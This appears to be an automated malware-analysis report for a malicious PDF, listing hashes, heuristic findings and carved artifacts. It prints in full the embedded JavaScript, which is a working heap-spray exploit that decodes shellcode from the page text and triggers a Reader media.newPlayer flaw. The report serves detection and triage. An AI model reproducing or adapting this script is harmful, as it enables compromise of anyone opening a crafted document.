Malicious PDF — malware analysis report

Static analysis result for SHA-256 debca4ecb531aa6b…

MALICIOUS

PDF

690.8 KB Created: 2010-06-22 13:09:38 Authoring application: Scribus 1.3.3.14 (via Scribus PDF Library 1.3.3.14) First seen: 2026-05-10
MD5: 6b10f9ab95c32190cfc732d37495bc10 SHA-1: 28e43c5ed8c3198ba36660731ad0d81a20fb8f7f SHA-256: debca4ecb531aa6b47a5edad712f50f4cd15f55912873ccd16f4bcdd6debcc9e
150 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The PDF_UNESCAPE heuristic suggests that the JavaScript is obfuscated, likely to hide its malicious intent. The presence of 'javascript_obj0055_001.js' as an extracted artifact further supports this. The primary function of the script appears to be downloading and executing a second-stage payload, which is a common technique for malware delivery.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9010

Heuristics 5

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    }
var Wo = unescape(shell);
var yR = unescape('%u3727%u27f5');
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.monotype.comMonotype Referenced by PDF JavaScript
    • http://www.monotype.com/html/mtname/ms_timesnewroman.htmlhttp://www.monotype.com/html/mtname/ms_welcome.htmlhttp://www.monotype.com/html/type/license.htmlReferenced by PDF JavaScript
    • https://www.verisign.com/rpaReferenced by PDF JavaScript
    • http://ocsp.verisign.com/ocsp/status0Referenced by PDF JavaScript
    • https://www.verisign.com/rpa0Referenced by PDF JavaScript
    • http://crl.microsoft.com/pki/crl/products/CodeSignPCA.crl0Referenced by PDF JavaScript
    • http://www.microsoft.com/typographyReferenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0055_001.js pdf-javascript-stream PDF /JS object 55 at offset 0xAC2C7 1303 bytes
SHA-256: 010992f011307af659e1ffd148e873c75aa77a54b28734c4720c8bf89a249e8e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function New_Script()
{
var ckWord, numWords;
var text = '';

for (var i = 0; i < this.numPages; i++ ) 
{
numWords = this.getPageNumWords(i);
for (var j = 0; j < numWords; j++) 
{
ckWord = this.getPageNthWord(i, j);
text = text + ckWord.toString();
}
}

text = text + ' ';


var k = 1;
var b=0;
var shell = '';
var shell_1 = '';
var shell_2 = '';
var u_shell = '';
var pos = 0;
while (pos < (text.length-1)) {
 pos += k;
 if(!b)
 {
	b = 1;
	if (pos < text.length)
	{ shell_1 = shell_1 + text[pos] + text[pos+1]; pos+=2; }
	else 
	{ shell_1 = shell_1 + text[pos]; pos+=1; }
 }
 else
 {
	b = 0;
	if (pos < text.length)
	{ shell_2 = shell_2 + text[pos] + text[pos+1]; pos+=2; }
	else 
	{ shell_2 = shell_2 + text[pos]; pos+=1; }
	
	u_shell = '%u'+shell_2+shell_1;
	shell_1 = '';
	shell_2 = '';
	shell += u_shell;
 }
 k++;
 if (k>3) k = 1;
}
var Wo = unescape(shell);
var yR = unescape('%u3727%u27f5');
for(i=0;i<15;){yR+=yR;i ++;}
yR=yR.substring(0,32768 - Wo.length);

memory=new Array();

for(i=0;i<0x2000;) {
	memory[i]= yR + Wo; i ++;
}

util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
try {var obj = this.media;obj['new'+'Player'](null);} catch(e) {}
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());


}
stream_000_off00000782.bin decompressed-pdf-stream PDF FlateDecoded stream at offset 0x782 409280 bytes
SHA-256: fcb479a00bdf7c05a68b91ba89a8ea3dd2be027dcca112f1f26270c081dc3502

Open this report in the interactive analyzer, or submit your own file for analysis.